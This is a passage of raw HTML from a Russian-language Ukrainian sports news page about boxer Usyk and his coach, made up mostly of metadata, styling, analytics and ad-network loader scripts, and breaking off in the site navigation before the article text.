<!DOCTYPE html>
<html lang="ru-RU">
<head>
	<meta charset="UTF-8"/>
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<link rel="profile" href="http://gmpg.org/xfn/11"/>
	<link rel="pingback" href="https://euro.com.ua/xmlrpc.php"/>
	<title>Усик: Нашел нормального тренера, когда стал чемпионом мира | EURO.com.ua</title>
<script type="application/javascript">var newsmax_ruby_ajax_url = "https://euro.com.ua/wp-admin/admin-ajax.php"</script>
<!-- This site is optimized with the Yoast SEO plugin v12.7.1 - https://yoast.com/wordpress/plugins/seo/ -->
<meta name="description" content="К последним поединкам готовился под руководством Ткаченко #Ткаченко #Усик Источник - sport.ua. Обязательный претендент на пояс WBO в супертяжелом весе"/>
<meta name="robots" content="max-snippet:-1, max-image-preview:large, max-video-preview:-1"/>
<link rel="canonical" href="https://euro.com.ua/box/2020/01/02/ysik-nashel-normalnogo-trenera-kogda-stal-chempionom-mira/" />
<meta property="og:locale" content="ru_RU" />
<meta property="og:type" content="article" />
<meta property="og:title" content="Усик: Нашел нормального тренера, когда стал чемпионом мира | EURO.com.ua" />
<meta property="og:description" content="К последним поединкам готовился под руководством Ткаченко #Ткаченко #Усик Источник - sport.ua. Обязательный претендент на пояс WBO в супертяжелом весе" />
<meta property="og:url" content="https://euro.com.ua/box/2020/01/02/ysik-nashel-normalnogo-trenera-kogda-stal-chempionom-mira/" />
<meta property="og:site_name" content="Свежие новости спорта" />
<meta property="article:section" content="Бокс" />
<meta property="article:published_time" content="2020-01-02T06:33:03+00:00" />
<meta property="og:image" content="https://euro.com.ua/wp-content/uploads/2020/01/c7fbf82920e3e4543b413594522b8200.png" />
<meta property="og:image:secure_url" content="https://euro.com.ua/wp-content/uploads/2020/01/c7fbf82920e3e4543b413594522b8200.png" />
<meta property="og:image:width" content="630" />
<meta property="og:image:height" content="378" />
<meta name="twitter:card" content="summary_large_image" />
<meta name="twitter:description" content="К последним поединкам готовился под руководством Ткаченко #Ткаченко #Усик Источник - sport.ua. Обязательный претендент на пояс WBO в супертяжелом весе" />
<meta name="twitter:title" content="Усик: Нашел нормального тренера, когда стал чемпионом мира | EURO.com.ua" />
<meta name="twitter:image" content="https://euro.com.ua/wp-content/uploads/2020/01/c7fbf82920e3e4543b413594522b8200.png" />
<script type='application/ld+json' class='yoast-schema-graph yoast-schema-graph--main'>{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://euro.com.ua/#website","url":"https://euro.com.ua/","name":"\u0421\u0432\u0435\u0436\u0438\u0435 \u043d\u043e\u0432\u043e\u0441\u0442\u0438 \u0441\u043f\u043e\u0440\u0442\u0430","description":"\u0433\u043b\u0430\u0432\u043d\u044b\u0435 \u0441\u043f\u043e\u0440\u0442\u0438\u0432\u043d\u044b\u0435 \u043d\u043e\u0432\u043e\u0441\u0442\u0438 \u0423\u043a\u0440\u0430\u0438\u043d\u044b \u0438 \u043c\u0438\u0440\u0430","potentialAction":{"@type":"SearchAction","target":"https://euro.com.ua/?s={search_term_string}","query-input":"required name=search_term_string"}},{"@type":"ImageObject","@id":"https://euro.com.ua/box/2020/01/02/ysik-nashel-normalnogo-trenera-kogda-stal-chempionom-mira/#primaryimage","url":"https://euro.com.ua/wp-content/uploads/2020/01/c7fbf82920e3e4543b413594522b8200.png","width":630,"height":378},{"@type":"WebPage","@id":"https://euro.com.ua/box/2020/01/02/ysik-nashel-normalnogo-trenera-kogda-stal-chempionom-mira/#webpage","url":"https://euro.com.ua/box/2020/01/02/ysik-nashel-normalnogo-trenera-kogda-stal-chempionom-mira/","inLanguage":"ru-RU","name":"\u0423\u0441\u0438\u043a: \u041d\u0430\u0448\u0435\u043b \u043d\u043e\u0440\u043c\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0442\u0440\u0435\u043d\u0435\u0440\u0430, \u043a\u043e\u0433\u0434\u0430 \u0441\u0442\u0430\u043b \u0447\u0435\u043c\u043f\u0438\u043e\u043d\u043e\u043c \u043c\u0438\u0440\u0430 | EURO.com.ua","isPartOf":{"@id":"https://euro.com.ua/#website"},"primaryImageOfPage":{"@id":"https://euro.com.ua/box/2020/01/02/ysik-nashel-normalnogo-trenera-kogda-stal-chempionom-mira/#primaryimage"},"datePublished":"2020-01-02T06:33:03+00:00","dateModified":"2020-01-02T06:33:03+00:00","author":{"@id":"https://euro.com.ua/#/schema/person/8892ebfc66815622627b7124d69dfb1f"},"description":"\u041a \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u043c \u043f\u043e\u0435\u0434\u0438\u043d\u043a\u0430\u043c \u0433\u043e\u0442\u043e\u0432\u0438\u043b\u0441\u044f \u043f\u043e\u0434 \u0440\u0443\u043a\u043e\u0432\u043e\u0434\u0441\u0442\u0432\u043e\u043c \u0422\u043a\u0430\u0447\u0435\u043d\u043a\u043e #\u0422\u043a\u0430\u0447\u0435\u043d\u043a\u043e #\u0423\u0441\u0438\u043a \u0418\u0441\u0442\u043e\u0447\u043d\u0438\u043a - sport.ua. \u041e\u0431\u044f\u0437\u0430\u0442\u0435\u043b\u044c\u043d\u044b\u0439 \u043f\u0440\u0435\u0442\u0435\u043d\u0434\u0435\u043d\u0442 \u043d\u0430 \u043f\u043e\u044f\u0441 WBO \u0432 \u0441\u0443\u043f\u0435\u0440\u0442\u044f\u0436\u0435\u043b\u043e\u043c \u0432\u0435\u0441\u0435"},{"@type":["Person"],"@id":"https://euro.com.ua/#/schema/person/8892ebfc66815622627b7124d69dfb1f","name":"Admin","image":{"@type":"ImageObject","@id":"https://euro.com.ua/#authorlogo","url":"https://secure.gravatar.com/avatar/?s=96&d=mm&r=g","caption":"Admin"},"sameAs":[]}]}</script>
<!-- / Yoast SEO plugin. -->

<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Свежие новости спорта &raquo; Лента" href="https://euro.com.ua/feed/" />
<link rel="alternate" type="application/rss+xml" title="Свежие новости спорта &raquo; Лента комментариев" href="https://euro.com.ua/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="Свежие новости спорта &raquo; Лента комментариев к &laquo;Усик: Нашел нормального тренера, когда стал чемпионом мира&raquo;" href="https://euro.com.ua/box/2020/01/02/ysik-nashel-normalnogo-trenera-kogda-stal-chempionom-mira/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/euro.com.ua\/wp-includes\/js\/wp-emoji-release.min.js?ver=39357509287b6196d3fd6c28e8a15c32"}};
			!function(e,a,t){var r,n,o,i,p=a.createElement("canvas"),s=p.getContext&&p.getContext("2d");function c(e,t){var a=String.fromCharCode;s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,e),0,0);var r=p.toDataURL();return s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,t),0,0),r===p.toDataURL()}function l(e){if(!s||!s.fillText)return!1;switch(s.textBaseline="top",s.font="600 32px Arial",e){case"flag":return!c([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])&&(!c([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!c([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]));case"emoji":return!c([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340])}return!1}function d(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(i=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},o=0;o<i.length;o++)t.supports[i[o]]=l(i[o]),t.supports.everything=t.supports.everything&&t.supports[i[o]],"flag"!==i[o]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[i[o]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(r=t.source||{}).concatemoji?d(r.concatemoji):r.wpemoji&&r.twemoji&&(d(r.twemoji),d(r.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<link rel='stylesheet' id='newsmax_ruby_core_style-css'  href='https://euro.com.ua/wp-content/plugins/newsmax-core/assets/style.css?ver=1.5' type='text/css' media='all' />
<link rel='stylesheet' id='wp-block-library-css'  href='https://euro.com.ua/wp-includes/css/dist/block-library/style.min.css?ver=39357509287b6196d3fd6c28e8a15c32' type='text/css' media='all' />
<link rel='stylesheet' id='contact-form-7-css'  href='https://euro.com.ua/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.1.6' type='text/css' media='all' />
<link rel='stylesheet' id='bootstrap-css'  href='https://euro.com.ua/wp-content/themes/newsmax/assets/external/bootstrap.css?ver=v3.3.1' type='text/css' media='all' />
<link rel='stylesheet' id='font-awesome-css'  href='https://euro.com.ua/wp-content/plugins/types/vendor/toolset/toolset-common/res/lib/font-awesome/css/font-awesome.min.css?ver=4.7.0' type='text/css' media='screen' />
<link rel='stylesheet' id='simple-line-icons-css'  href='https://euro.com.ua/wp-content/themes/newsmax/assets/external/simple-line-icons.css?ver=v2.4.0' type='text/css' media='all' />
<link rel='stylesheet' id='newsmax-miscellaneous-css'  href='https://euro.com.ua/wp-content/themes/newsmax/assets/css/miscellaneous.css?ver=1.8' type='text/css' media='all' />
<link rel='stylesheet' id='newsmax-ruby-main-css'  href='https://euro.com.ua/wp-content/themes/newsmax/assets/css/main.css?ver=1.8' type='text/css' media='all' />
<link rel='stylesheet' id='newsmax-ruby-responsive-css'  href='https://euro.com.ua/wp-content/themes/newsmax/assets/css/responsive.css?ver=1.8' type='text/css' media='all' />
<link rel='stylesheet' id='newsmax-ruby-style-css'  href='https://euro.com.ua/wp-content/themes/newsmax-child/style.css?ver=1.8' type='text/css' media='all' />
<style id='newsmax-ruby-style-inline-css' type='text/css'>
input[type="button"]:hover, button:hover, .ruby-error p, .category-header-outer .archive-header,.main-menu-inner > li > a:hover, .main-menu-inner > li > a:focus, .mega-col-menu.sub-menu .mega-col-menu-inner a:hover,.mega-col-menu.sub-menu .mega-col-menu-inner .current-menu-item > a, .no-menu a, .small-menu-wrap .sub-menu li > a:hover, .main-menu-inner > li.current_page_item > a,.off-canvas-nav-wrap a:hover, .off-canvas-nav-wrap .sub-menu a:hover, .breaking-news-title .mobile-headline, .breadcrumb-inner a:hover, .breadcrumb-inner a:focus, .post-meta-info a:hover,.box-author-total-post, .title-nothing > *, .single .single-title.post-title, .share-total-number, .view-total-number, .sb-widget-instagram .instagram-bottom-text:hover,.box-author-title a, .box-author-desc a, .box-author-viewmore > a, .entry a:not(button),.entry blockquote:before, .comments-area .comment-reply-title, .comments-area .logged-in-as a:hover,.comment-title h3, .comment-author.vcard .fn a:hover, .comments-area .comment-awaiting-moderation,.widget li a:hover, .instagram-bottom-text a:hover, .twitter-content.post-excerpt a, .entry cite{ color: #0778cf;}input[type="submit"], button, .ruby-slider-popup-nav, li.is-current-sub,.main-menu-inner .sub-menu .current-menu-item > a, .sub-menu > li > a:hover,.small-menu-outer:hover .icon-toggle, .small-menu-outer:hover .icon-toggle:before,.small-menu-outer:hover .icon-toggle:after, .cat-info-el:before, .ajax-nextprev.ajax-pagination a:hover,.is-light-text .ajax-nextprev.ajax-pagination a:hover, .ruby-block-wrap .ajax-loadmore-link:hover, .popup-thumbnail-slider-outer .ruby-slider-nav:hover,.ruby-slider-nav:hover, a.page-numbers:hover, a.page-numbers:focus, .page-numbers.current, .is-logo-text h1:after,.is-logo-text .logo-title:after, .pagination-next-prev a:hover, .pagination-next-prev a:focus, .blog-loadmore-link:hover,.ajax-related-video a:hover, .single-post-box-related-video.is-light-text .block-title h3:before, .single-post-box-related .ajax-loadmore-link:hover,input[type="button"].ninja-forms-field, .entry input[type="submit"], .single-page-links .pagination-num > span,.box-comment-btn-wrap:hover, .reply a.comment-reply-link:hover, .reply a.comment-reply-link:focus,.comments-area a.comment-edit-link:hover, .comments-area #cancel-comment-reply-link:hover, .widget-btn:hover, .header-style-5 .widget-btn.fw-widget-instagram .instagram-bottom-text:hover, .is-cat-style-2 .cat-info-el, .is-cat-style-3 .cat-info-el, .post-btn a:hover, .post-btn a:focus{ background-color: #0778cf;}.single-post-6 .single-post-overlay-header{ border-color: #0778cf;}.video-playlist-iframe-nav::-webkit-scrollbar-corner {background-color: #0778cf;}.video-playlist-iframe-nav::-webkit-scrollbar-thumb {background-color: #0778cf;}.widget_tag_cloud a:hover { background-color: #0778cf!important;}.topbar-wrap, .topbar-menu-inner .sub-menu{ background-color: #000000;}.topbar-wrap a:hover{ opacity: 1; color: #f2f2f2;}@media only screen and (min-width: 1200px) {body {padding:40px 0;}}.small-menu-inner > li > a, .breadcrumb-wrap, .widget-btn { font-family: Noto Sans;}.small-menu-inner > li > a, .widget-btn { font-weight: 400;}.small-menu-inner .sub-menu { font-family: Noto Sans;}.logo-inner img {max-height: 57px;}.footer-copyright-wrap { background-color: #020202;}.footer-copyright-wrap .copyright-text, .footer-copyright-wrap .footer-menu-inner{font-size:9px;}.post-review-icon, .post-review-score, .score-bar, .review-box-wrap .post-review-info { background-color: #fcea49;}.review-el .review-info-score { color: #fcea49;}h1 {font-family:Merriweather;}h1 {font-weight:700;}h2 {font-family:Merriweather;}h2 {font-weight:700;}h3 {font-family:Merriweather;}h3 {font-weight:700;}h4 {font-family:Merriweather;}h4 {font-weight:700;}h5 {font-family:Merriweather;}h5 {font-weight:700;}h6 {font-family:Merriweather;}h6 {font-weight:700;}@media only screen and (min-width: 992px) and (max-width: 1199px) {body .post-title.is-size-0 {}body .post-title.is-size-1 {}body .post-title.is-size-2 {}body .post-title.is-size-3 {}body .post-title.is-size-4 {}}@media only screen and (max-width: 991px) {body .post-title.is-size-0 {}body .post-title.is-size-1 {}body .post-title.is-size-2 {}body .post-title.is-size-3 {}body .post-title.is-size-4 {}}@media only screen and (max-width: 767px) {body .post-title.is-size-0 {}body .post-title.is-size-1 {}body .post-title.is-size-2 {}body .post-title.is-size-3 {}body .post-title.is-size-4, .post-list-2 .post-title a, .post-list-3 .post-title a {}}@media only screen and (max-width: 767px) {body, p {}.post-excerpt p {}.entry h1 {}.entry h2 {}.entry h3 {}.entry h4 {}.entry h5 {}.entry h6 {}}.post-meta-info-duration { font-family:Noto Sans;}.widget_recent_entries li a, .recentcomments a { font-family:Merriweather;}
#newsmax_ruby_navbar_widget_button-_multiwidget .widget-btn {}#newsmax_ruby_navbar_widget_button-_multiwidget .widget-btn:hover {}
</style>
<link rel='stylesheet' id='upprev-css-css'  href='https://euro.com.ua/wp-content/plugins/upprev/styles/upprev.css?ver=3.4.1' type='text/css' media='all' />
<link rel='stylesheet' id='redux-google-fonts-newsmax_ruby_theme_options-css'  href='https://fonts.googleapis.com/css?family=Noto+Sans%3A400%2C700%2C400italic%2C700italic%7CMerriweather%3A900%2C700%7CLato%3A400%7CPoppins%3A700%2C400&#038;subset=latin&#038;ver=1547987672' type='text/css' media='all' />
<script type="text/javascript">
var iworks_upprev = { animation: 'flyout', position: 'right', offset_percent: 75, offset_element: '.single-post-box-outer', css_width: 360, css_side: 5, compare: 'category', url_new_window: 0, ga_track_views: 1, ga_track_clicks: 1, ga_opt_noninteraction: 1, title: 'Усик: Нашел нормального тренера, когда стал чемпионом мира' };
</script>
<script type='text/javascript' src='https://euro.com.ua/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp'></script>
<script type='text/javascript' src='https://euro.com.ua/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript' src='https://euro.com.ua/wp-content/plugins/wp-hide-post/public/js/wp-hide-post-public.js?ver=2.0.10'></script>
<!--[if lt IE 9]>
<script type='text/javascript' src='https://euro.com.ua/wp-content/themes/newsmax/assets/external/html5shiv.min.js?ver=3.7.3'></script>
<![endif]-->
<script type='text/javascript' src='https://euro.com.ua/wp-content/plugins/upprev/scripts/upprev.js?ver=3.4.1'></script>
<link rel='https://api.w.org/' href='https://euro.com.ua/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://euro.com.ua/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://euro.com.ua/wp-includes/wlwmanifest.xml" /> 

<link rel='shortlink' href='https://euro.com.ua/?p=156470' />
<link rel="alternate" type="application/json+oembed" href="https://euro.com.ua/wp-json/oembed/1.0/embed?url=https%3A%2F%2Feuro.com.ua%2Fbox%2F2020%2F01%2F02%2Fysik-nashel-normalnogo-trenera-kogda-stal-chempionom-mira%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://euro.com.ua/wp-json/oembed/1.0/embed?url=https%3A%2F%2Feuro.com.ua%2Fbox%2F2020%2F01%2F02%2Fysik-nashel-normalnogo-trenera-kogda-stal-chempionom-mira%2F&#038;format=xml" />
<style type="text/css">.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style>     <meta name="gravitec" content="wordpress-plugin"/> 
            <script>
        Gravitec.setDefaultNotificationUrl("https://euro.com.ua");
        gravitec_options['wordpress'] = true;     
    </script>
<link rel="icon" href="https://euro.com.ua/wp-content/uploads/2018/11/iconeuro-150x150.png" sizes="32x32" />
<link rel="icon" href="https://euro.com.ua/wp-content/uploads/2018/11/iconeuro.png" sizes="192x192" />
<link rel="apple-touch-icon-precomposed" href="https://euro.com.ua/wp-content/uploads/2018/11/iconeuro.png" />
<meta name="msapplication-TileImage" content="https://euro.com.ua/wp-content/uploads/2018/11/iconeuro.png" />

<!-- BEGIN ExactMetrics v5.3.10 Universal Analytics - https://exactmetrics.com/ -->
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
	(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
	m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
  ga('create', 'UA-6590826-2', 'auto');
  ga('send', 'pageview');
</script>
<!-- END ExactMetrics Universal Analytics -->
<style type="text/css" title="dynamic-css" class="options-output">body{background-color:#fafafa;background-repeat:no-repeat;background-size:cover;background-attachment:fixed;background-position:center bottom;}.banner-wrap{background-color:#ffffff;background-repeat:no-repeat;background-size:cover;background-attachment:fixed;background-position:center center;}.footer-inner{background-color:#020202;background-repeat:no-repeat;background-size:cover;background-attachment:fixed;background-position:center center;}body,p{font-family:"Noto Sans";font-weight:400;font-style:normal;}.post-title.is-size-0{font-family:Merriweather;font-weight:900;font-style:normal;}.post-title.is-size-1{font-family:Merriweather;font-weight:900;font-style:normal;}.post-title.is-size-2{font-family:Merriweather;font-weight:900;font-style:normal;}.post-title.is-size-3{font-family:Merriweather;font-weight:900;font-style:normal;}.post-title.is-size-4{font-family:Merriweather;font-weight:700;font-style:normal;}.post-cat-info{font-family:"Noto Sans";text-transform:uppercase;font-weight:400;font-style:normal;}.post-meta-info{font-family:"Noto Sans";font-weight:400;font-style:normal;color:#aaaaaa;}.post-btn a{font-family:Lato;font-weight:400;font-style:normal;font-size:11px;}.block-header-wrap,.is-block-header-style-5 .block-header-wrap{font-family:"Noto Sans";text-transform:uppercase;font-weight:400;font-style:normal;font-size:13px;}.widget-title, .is-block-header-style-5 .widget-title.block-title{font-family:"Noto Sans";text-transform:uppercase;font-weight:400;font-style:normal;font-size:12px;}.main-menu-inner > li > a{font-family:"Noto Sans";text-transform:uppercase;font-weight:400;font-style:normal;}.navbar-wrap .is-sub-default{font-family:"Noto Sans";text-transform:capitalize;font-weight:400;font-style:normal;}.topbar-wrap{font-family:"Noto Sans";text-transform:uppercase;letter-spacing:1px;font-weight:400;font-style:normal;font-size:10px;}.off-canvas-nav-wrap{font-family:"Noto Sans";text-transform:uppercase;font-weight:700;font-style:normal;}.off-canvas-nav-wrap .sub-menu a{font-family:"Noto Sans";text-transform:uppercase;font-weight:400;font-style:normal;}.logo-wrap.is-logo-text .logo-title,.off-canvas-logo-wrap.is-logo-text .logo-text{font-family:Poppins;font-weight:700;font-style:normal;}.site-tagline{font-family:Poppins;font-weight:400;font-style:normal;}.logo-mobile-wrap .logo-text{font-family:Poppins;text-transform:uppercase;font-weight:normal;font-style:normal;}.entry h1{font-family:Merriweather;font-weight:700;font-style:normal;}.entry h2{font-family:Merriweather;font-weight:700;font-style:normal;}.entry h3{font-family:Merriweather;font-weight:700;font-style:normal;}.entry h4{font-family:Merriweather;font-weight:700;font-style:normal;}.entry h5{font-family:Merriweather;font-weight:700;font-style:normal;}.entry h6{font-family:Merriweather;font-weight:700;font-style:normal;}</style><style type="text/css">
#upprev_box{bottom:5px;width:360px;right:5px;display:block;right:-415px;display:block;}
 </style>
	
	<!--GO2NET-->
	
	<script type='text/javascript'> (function() { var w = window, d = document, protocol =/https/i.test(w.location.protocol) ? 'https:' : 'http:', aml = typeof admixerML !== 'undefined' ? admixerML : { }; aml.fn = aml.fn || []; aml.invPath = aml.invPath || (protocol + '//inv-nets.admixer.net/'); aml.cdnPath = aml.cdnPath || (protocol + '//cdn.admixer.net/'); if (!w.admixerML) { var lodash = document.createElement('script'); lodash.id = 'amlScript'; lodash.async = true; lodash.type = 'text/javascript'; lodash.src = aml.cdnPath + 'scripts3/loader2.js'; var node = d.getElementsByTagName('script')[0]; node.parentNode.insertBefore(lodash, node); w.admixerML = aml; } })(); </script>
<script type='text/javascript'>
admixerML.fn.push(function() {
admixerML.defineSlot({z: 'f25f6eaa-ea17-495f-a640-4bd9bf898ed3', ph: 'go2net_f25f6eaaea17495fa6404bd9bf898ed3_zone_13320_sect_4026_site_3590', i: 'inv-nets', s:'b611df4a-0223-4d00-93c5-0e7983b2b733'});
admixerML.defineSlot({z: 'bc83d331-bdf0-4140-b9fb-c33aec9031c2', ph: 'go2net_bc83d331bdf04140b9fbc33aec9031c2_zone_13321_sect_4026_site_3590', i: 'inv-nets', s:'b611df4a-0223-4d00-93c5-0e7983b2b733'});
admixerML.defineSlot({z: '15f91d8f-ca48-42d2-92a4-0b622fb7d123', ph: 'go2net_15f91d8fca4842d292a40b622fb7d123_zone_14615_sect_4026_site_3590', i: 'inv-nets', s:'b611df4a-0223-4d00-93c5-0e7983b2b733'});
admixerML.defineSlot({z: '4eabb787-e5b4-4f48-b623-3dc2490508ae', ph: 'go2net_4eabb787e5b44f48b6233dc2490508ae_zone_23769_sect_4026_site_3590', i: 'inv-nets', s:'b611df4a-0223-4d00-93c5-0e7983b2b733'});
admixerML.defineSlot({z: 'ff998510-3bc8-47cf-b41b-647f58152521', ph: 'go2net_ff9985103bc847cfb41b647f58152521_zone_26046_sect_4026_site_3590', i: 'inv-nets', s:'b611df4a-0223-4d00-93c5-0e7983b2b733'});
admixerML.defineSlot({z: 'e162c87c-0f35-4c2e-86e0-43accf0e86e2', ph: 'admixer_e162c87c0f354c2e86e043accf0e86e2_zone_33315_sect_10441_site_7501', i: 'inv-nets', s:'c5a707fe-598a-4d1f-a676-5eb2a3eb49ab'});
admixerML.defineSlot({z: 'd69cb801-da0f-48f2-9c83-43c3c023a357', ph: 'admixer_d69cb801da0f48f29c8343c3c023a357_zone_33317_sect_10441_site_7501', i: 'inv-nets', s:'c5a707fe-598a-4d1f-a676-5eb2a3eb49ab'});
admixerML.defineSlot({z: 'aecdb980-0ddc-4f9e-8431-6f95b52ea7b1', ph: 'admixer_aecdb9800ddc4f9e84316f95b52ea7b1_zone_33318_sect_10441_site_7501', i: 'inv-nets', s:'c5a707fe-598a-4d1f-a676-5eb2a3eb49ab'});
admixerML.defineSlot({z: '38d417c0-f2d3-41dd-8004-06b8aceb2df0', ph: 'admixer_38d417c0f2d341dd800406b8aceb2df0_zone_33420_sect_10441_site_7501', i: 'inv-nets', s:'c5a707fe-598a-4d1f-a676-5eb2a3eb49ab'});
admixerML.singleRequest();
});
</script>
<!--GO2NET END-->

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({
          google_ad_client: "ca-pub-3009791374728080",
          enable_page_level_ads: true
     });
</script>
<script src="https://cdn.gravitec.net/storage/3ff56b6f81b69ce32f54e1d47e1fc071/client.js" async></script>
</head>


<body class="post-template-default single single-post postid-156470 single-format-standard ruby-body is-holder is-navbar-sticky is-site-boxed is-smooth-scroll is-site-smooth-display is-sidebar-style-2 is-breadcrumb is-tooltips is-back-top is-back-top-touch is-block-header-style-4 is-cat-style-4 is-btn-style-1 is-entry-padding is-entry-image-popup is-hide-sidebar is-ajax-view"  itemscope  itemtype="https://schema.org/WebPage"  data-slider_autoplay="1" data-slider_play_speed="5550" >

<!-- Rating@Mail.ru counter -->
<script type="text/javascript">
var _tmr = window._tmr || (window._tmr = []);
_tmr.push({id: "3086486", type: "pageView", start: (new Date()).getTime()});
(function (d, w, id) {
  if (d.getElementById(id)) return;
  var ts = d.createElement("script"); ts.type = "text/javascript"; ts.async = true; ts.id = id;
  ts.src = "https://top-fwz1.mail.ru/js/code.js";
  var f = function () {var s = d.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ts, s);};
  if (w.opera == "[object Opera]") { d.addEventListener("DOMContentLoaded", f, false); } else { f(); }
})(document, window, "topmailru-code");
</script><noscript><div>
<img src="https://top-fwz1.mail.ru/counter?id=3086486;js=na" style="border:0;position:absolute;left:-9999px;" alt="Top.Mail.Ru" />
</div></noscript>
<!-- //Rating@Mail.ru counter -->

<!-- Adbet -->
<script>
  (function(w,d,o,g,r,a,m){
    d.write('<div id="'+(cid=(Math.random()*1e17).toString(36))+'"></div>');
    w[r]=w[r]||function(){(w[r+'l']=w[r+'l']||[]).push(arguments)};
    function e(b,w,r){if(w[r+'h']=b.pop()){
        a=d.createElement(o),p=d.getElementsByTagName(o)[0];a.async=1;
        a.src='//cdn.'+w[r+'h']+'/libs/b.js';a.onerror=function(){e(g,w,r)};p.parentNode.insertBefore(a,p)
    }}if(!w.ABN){e(g,w,r)};w[r](cid,{id:2059501386})
  })(window,document,'script',['braun634.com'],'ABNS');
</script>


<!-- End Adbet -->


<div class="off-canvas-wrap is-light-style is-dark-text">
	<a href="#" id="ruby-off-canvas-close-btn"><i class="ruby-close-btn"></i></a>
	<div class="off-canvas-inner">

						<div class="off-canvas-logo-wrap is-logo-image">
		<div class="logo-inner">
			<a href="https://euro.com.ua/" class="logo" title="Новости спорта">
				<img height="57" width="280" src="https://euro.com.ua/wp-content/uploads/2018/11/logoeurocomua-1.png" alt="главные спортивные новости Украины и мира">
			</a>
		</div>
	</div>
		
		
		
					<div id="ruby-off-canvas-nav" class="off-canvas-nav-wrap">
				<div class="menu-canvas-menu-container"><ul id="offcanvas-menu" class="off-canvas-nav-inner"><li id="menu-item-1742" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1742 is-category-1"><a href="https://euro.com.ua/football/">Футбол</a></li>
<li id="menu-item-1743" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1743 is-category-6"><a href="https://euro.com.ua/hockey/">Хоккей</a></li>
<li id="menu-item-1738" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1738 is-category-8"><a href="https://euro.com.ua/basketball/">Баскетбол</a></li>
<li id="menu-item-1741" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1741 is-category-4"><a href="https://euro.com.ua/tennis/">Теннис</a></li>
<li id="menu-item-1737" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1737 is-category-3"><a href="https://euro.com.ua/autosport/">Автоспорт</a></li>
<li id="menu-item-1740" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-1740 is-category-5"><a href="https://euro.com.ua/box/">Бокс</a></li>
<li id="menu-item-99422" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-99422 is-category-22914"><a href="https://euro.com.ua/raznoe/">Разное</a></li>
</ul></div>			</div>
		
					<div class="off-canvas-widget-section-wrap">
				<section id="newsmax_ruby_sb_widget_post-3" class="widget sb-widget-post"><div class="block-title widget-title"><h3>Новое на сайте</h3></div><div class="widget-post-block-outer is-style-1"><div id="block_newsmax_ruby_sb_widget_post-3" class="ruby-block-wrap block-widget-post is-ajax-pagination is-dark-block is-fullwidth" data-block_id= block_newsmax_ruby_sb_widget_post-3 data-block_name= newsmax_ruby_block_widget_post data-posts_per_page= 4 data-block_page_max= 6160 data-block_page_current= 1 data-category_id= all data-orderby= date_post data-block_style= 1 ><div class="ruby-block-inner"><div class="block-content-wrap"><div class="block-content-inner clearfix row"><div class="post-outer"><article class="post-wrap post-list post-list-4 clearfix"><div class="post-thumb-outer ruby-animated-image ruby-fade"><div class="post-thumb is-image"><a href="https://euro.com.ua/tennis/2020/01/02/ykraincy-na-tyrnirah-tennis-europe-2-ianvaria-obnovliaetsia/" title="Украинцы на турнирах 